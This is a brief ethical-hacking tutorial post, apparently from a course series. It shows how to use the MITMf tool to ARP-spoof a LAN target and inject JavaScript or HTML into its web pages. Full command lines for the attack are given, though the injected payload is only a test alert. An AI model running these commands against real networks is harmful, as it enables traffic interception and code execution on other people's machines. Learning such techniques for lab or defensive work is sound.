zoukankan      html  css  js  c++  java
  • Ethical Hacking

    MITM - Code Injection

    • Inject javascript or HTML code into pages.
    • Code gets executed on target machine.
    • Use - - inject plugin.

    Code can be:

    1. Stored on a local file --js-file or --html-file

    2. Stored online --js-url or --html-url

    3. Or you can supply the code through the terminal --js-payload or --html-payload

    Usage Case 1:

    python2 mitmf.py --arp --spoof -i eth0 --gateway 10.0.0.1 --targets 10.0.0.22 --inject --js-payload "alter('test');"

    The inection code works.

    Usage case2:

    Edit the js file and save it as alert.js in the root folder.

    alert('test');

    Run the commands on the terminal.

    python2 mitmf.py --arp --spoof -i eth0 --gateway 10.0.0.1 --target 10.0.0.22 --inject --js-file /root/alert.js

     The injection file works...

    相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
  • 相关阅读:
    静态成员 执行顺序
    排序之插入排序
    结构体字节对齐问题
    建模基础&UML
    C#中隐藏(new)和方法重载(overide)的区别
    培训记录
    C笔记
    用例
    .NET架构
    C#格式化日期
  • 原文地址:https://www.cnblogs.com/keepmoving1113/p/12044150.html
Copyright © 2011-2022 走看看